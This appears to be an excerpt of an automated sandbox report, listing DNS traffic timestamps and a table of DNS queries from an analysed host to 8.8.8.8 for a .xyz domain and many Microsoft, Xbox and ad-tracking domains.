                                                                                                                                                                                                              May 12, 2021 15:15:51.452517033 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:15:52.035995960 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:15:52.117053986 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:06.067683935 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:06.139559031 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:06.140175104 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:06.204899073 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:06.247139931 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:06.318782091 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:07.027267933 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:07.095803976 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:07.108211040 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:07.168030024 CEST53560098.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:07.601083040 CEST6186553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:07.658341885 CEST53618658.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:07.672477007 CEST5517153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:07.732759953 CEST53551718.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:08.248032093 CEST5249653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:08.334218979 CEST53524968.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:08.343417883 CEST5756453192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:08.400854111 CEST53575648.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:18.307622910 CEST6300953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:18.362864017 CEST5931953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:18.368077040 CEST53630098.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:18.426393986 CEST53593198.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:19.583379984 CEST5307053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:19.640573978 CEST53530708.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:20.610035896 CEST5977053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:20.660887003 CEST53597708.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:21.820013046 CEST6152353192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:21.843539953 CEST6279153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:21.858684063 CEST5066753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:21.881464005 CEST53615238.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:21.905380011 CEST53627918.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:21.920897007 CEST53506678.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:21.925559998 CEST5412953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:21.983865023 CEST53541298.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.089318991 CEST6532953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:22.100760937 CEST6071853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:22.100815058 CEST4915753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:22.148617983 CEST53653298.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.150413036 CEST53491578.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.159540892 CEST53607188.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.495767117 CEST5739153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:22.571188927 CEST53573918.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.928603888 CEST6185853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:22.929992914 CEST6250053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:22.988930941 CEST53618588.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:23.004749060 CEST53625008.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:25.451899052 CEST5165253192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:25.503218889 CEST53516528.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:25.754065990 CEST6276253192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:25.754662037 CEST5690553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:25.757522106 CEST5460953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:25.775671959 CEST5810153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:25.778131962 CEST6432953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:25.802761078 CEST53627628.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:25.814483881 CEST53546098.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:25.814862967 CEST53569058.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:25.844027996 CEST53581018.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:25.850500107 CEST53643298.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:25.856817961 CEST6488153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:25.916368961 CEST53648818.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:26.375179052 CEST5532753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:26.426608086 CEST53553278.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:26.452219009 CEST5915053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:26.480972052 CEST6343953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:26.504035950 CEST53591508.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:26.531050920 CEST6504053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:26.539782047 CEST53634398.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:26.591227055 CEST53650408.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:27.333313942 CEST6136953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:27.343281031 CEST6551553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:27.381973028 CEST53613698.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:27.392450094 CEST6023653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:27.400444031 CEST53655158.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:27.408143997 CEST5319853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:27.453569889 CEST53602368.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:27.467878103 CEST53531988.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:28.366642952 CEST5002753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:28.441770077 CEST53500278.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:28.518333912 CEST5924553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:28.589936018 CEST53592458.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:29.349343061 CEST5584053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:29.428152084 CEST53558408.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:29.909832954 CEST6166753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:29.963320971 CEST53616678.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:49.254770994 CEST6373653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:49.314796925 CEST53637368.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:49.559058905 CEST5980553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:49.619250059 CEST53598058.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:50.267647982 CEST6373653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:50.320394039 CEST53637368.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:50.566339970 CEST5980553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:50.618091106 CEST53598058.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:51.281928062 CEST6373653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:51.334176064 CEST53637368.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:51.581697941 CEST5980553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:51.643340111 CEST53598058.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:53.294740915 CEST6373653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:53.347907066 CEST53637368.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:53.614217997 CEST5980553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:53.674468994 CEST53598058.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:55.715900898 CEST6232253192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:55.784738064 CEST53623228.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:55.798597097 CEST5281953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:55.857273102 CEST53528198.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:57.381834984 CEST6373653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:57.433401108 CEST53637368.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:57.616317987 CEST5980553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:57.672806025 CEST53598058.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:59.448286057 CEST5121553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:16:59.500497103 CEST53512158.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:17:53.742672920 CEST6031253192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:17:53.804402113 CEST53603128.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:17:53.806834936 CEST6346353192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:17:53.872474909 CEST53634638.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:20:56.880731106 CEST6222453192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:20:56.941900969 CEST53622248.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:00.589462996 CEST5906453192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:00.651665926 CEST53590648.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:01.439517975 CEST5988553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:01.445523024 CEST6374953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:01.449465036 CEST5087853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:01.461096048 CEST5846953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:01.491034985 CEST53598858.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:01.506702900 CEST53637498.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:01.511786938 CEST53508788.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:01.531650066 CEST53584698.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:02.055847883 CEST5477353192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:02.134011030 CEST53547738.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.038209915 CEST5216653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:04.049846888 CEST5458953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:04.073692083 CEST5811353192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:04.090781927 CEST5353353192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:04.099275112 CEST53521668.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.102807999 CEST5769653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:04.121445894 CEST53545898.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.139359951 CEST53581138.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.161962986 CEST53576968.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.164366007 CEST53535338.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.718451977 CEST5106853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:04.789113045 CEST53510688.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.843977928 CEST5294453192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:05.909655094 CEST53529448.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:07.287566900 CEST5619053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:07.341213942 CEST53561908.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:11.285825968 CEST6387753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:11.293438911 CEST6229953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:11.294612885 CEST5323953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:11.295154095 CEST6232053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:11.298311949 CEST6150753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:11.320133924 CEST5394053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:11.342760086 CEST53638778.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:11.354192972 CEST53532398.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:11.354746103 CEST53623208.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:11.358350992 CEST53622998.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:11.358577013 CEST53615078.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:11.369105101 CEST53539408.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:11.644896030 CEST5908953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:11.706711054 CEST53590898.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:12.092622042 CEST5173953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:12.144756079 CEST53517398.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:17.248347998 CEST5355253192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:17.307662010 CEST53535528.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:17.323726892 CEST6113553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:17.382313013 CEST53611358.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:17.402678013 CEST4935753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:17.466455936 CEST53493578.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:18.155548096 CEST5345153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:18.254508018 CEST53534518.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:30.221443892 CEST6218353192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:30.328083992 CEST53621838.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:31.097987890 CEST6165353192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:31.119649887 CEST5650953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:31.157116890 CEST53616538.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:31.159187078 CEST6217953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:31.173228025 CEST5472153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:31.181427956 CEST53565098.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:31.188051939 CEST5954953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:31.217571020 CEST53621798.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:31.231453896 CEST53547218.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:31.248473883 CEST53595498.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:35.382221937 CEST5046353192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:35.455982924 CEST53504638.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:36.207542896 CEST5902953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:36.218389034 CEST6054153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:36.224525928 CEST6273953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:36.236697912 CEST6251153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:36.239861965 CEST5440353192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:36.276910067 CEST53605418.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:36.281470060 CEST53590298.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:36.295298100 CEST53627398.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:36.313637972 CEST53544038.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:36.337560892 CEST53625118.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:36.962749958 CEST6203853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:37.011471987 CEST53620388.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:37.911756039 CEST5037753192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:37.971148968 CEST53503778.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:39.226851940 CEST5917153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:39.289236069 CEST53591718.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:39.461805105 CEST5972153192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:39.528345108 CEST5411053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:39.594022036 CEST53541108.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:39.606323004 CEST53597218.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:40.090123892 CEST6517853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST53651788.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:41.304218054 CEST5718553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:41.310303926 CEST5185953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:41.370922089 CEST53518598.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:41.374447107 CEST53571858.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:41.613141060 CEST6335553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:41.671910048 CEST53633558.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:41.867604971 CEST5912653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:41.938105106 CEST53591268.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:42.939758062 CEST5913653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:43.004435062 CEST53591368.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:43.384886026 CEST6193853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:43.416783094 CEST5460353192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:43.433542013 CEST53619388.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:43.477205038 CEST53546038.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:46.667066097 CEST5647253192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:46.726207972 CEST53564728.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:46.966739893 CEST6495653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:47.025876999 CEST53649568.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:47.054750919 CEST4955853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:47.138968945 CEST6048553192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:47.141972065 CEST53495588.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:47.151081085 CEST6207053192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:47.165731907 CEST5219653192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:47.201509953 CEST53604858.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:47.210259914 CEST53620708.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:47.216473103 CEST53521968.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:47.258678913 CEST5332453192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:47.293044090 CEST5920853192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:47.308598995 CEST5348953192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:47.324676037 CEST53533248.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:47.354356050 CEST53592088.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:47.367301941 CEST53534898.8.8.8192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:47.486074924 CEST6010453192.168.2.228.8.8.8
                                                                                                                                                                                                              May 12, 2021 15:21:47.544673920 CEST53601048.8.8.8192.168.2.22

                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                              May 12, 2021 15:15:50.952985048 CEST192.168.2.228.8.8.80xd372Standard query (0)000000027.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:15:51.062443018 CEST192.168.2.228.8.8.80xd372Standard query (0)000000027.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:21.925559998 CEST192.168.2.228.8.8.80x740eStandard query (0)support.content.office.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:22.100760937 CEST192.168.2.228.8.8.80x746cStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:22.100815058 CEST192.168.2.228.8.8.80x7f7bStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:22.929992914 CEST192.168.2.228.8.8.80x5121Standard query (0)mem.gfx.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:28.518333912 CEST192.168.2.228.8.8.80x34e0Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:01.439517975 CEST192.168.2.228.8.8.80xcc2bStandard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:01.461096048 CEST192.168.2.228.8.8.80xb8d8Standard query (0)assets.onestore.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.049846888 CEST192.168.2.228.8.8.80x5f47Standard query (0)assets.onestore.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.090781927 CEST192.168.2.228.8.8.80x9196Standard query (0)mem.gfx.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.102807999 CEST192.168.2.228.8.8.80x945bStandard query (0)microsoftwindows.112.2o7.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.718451977 CEST192.168.2.228.8.8.80x82b9Standard query (0)publisher.liveperson.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:05.843977928 CEST192.168.2.228.8.8.80x4fb8Standard query (0)logincdn.msauth.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:11.285825968 CEST192.168.2.228.8.8.80xc1bbStandard query (0)assets.onestore.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:11.294612885 CEST192.168.2.228.8.8.80x361fStandard query (0)mem.gfx.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:11.298311949 CEST192.168.2.228.8.8.80x3855Standard query (0)microsoftwindows.112.2o7.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:12.092622042 CEST192.168.2.228.8.8.80x746Standard query (0)amp.azure.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:17.402678013 CEST192.168.2.228.8.8.80xf103Standard query (0)assets.adobedtm.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:18.155548096 CEST192.168.2.228.8.8.80x6dfcStandard query (0)offertooldataprod.blob.core.windows.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:30.221443892 CEST192.168.2.228.8.8.80xb15fStandard query (0)surfaceselfserviceoffertool.azurewebsites.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:31.097987890 CEST192.168.2.228.8.8.80x5628Standard query (0)mem.gfx.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:31.159187078 CEST192.168.2.228.8.8.80x583cStandard query (0)assets.onestore.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:31.188051939 CEST192.168.2.228.8.8.80x6248Standard query (0)microsoftwindows.112.2o7.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:35.382221937 CEST192.168.2.228.8.8.80x7436Standard query (0)www.xbox.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:36.207542896 CEST192.168.2.228.8.8.80x3030Standard query (0)assets.xbox.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:36.224525928 CEST192.168.2.228.8.8.80xc184Standard query (0)compass-ssl.xbox.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:36.236697912 CEST192.168.2.228.8.8.80x9d40Standard query (0)c.xbox.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:36.239861965 CEST192.168.2.228.8.8.80x3373Standard query (0)account.xbox.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:39.226851940 CEST192.168.2.228.8.8.80xca23Standard query (0)ad.atdmt.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:39.461805105 CEST192.168.2.228.8.8.80xc684Standard query (0)controllers.xbox.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.090123892 CEST192.168.2.228.8.8.80x95a7Standard query (0)mscom.demdex.netA (IP address)IN (0x0001)
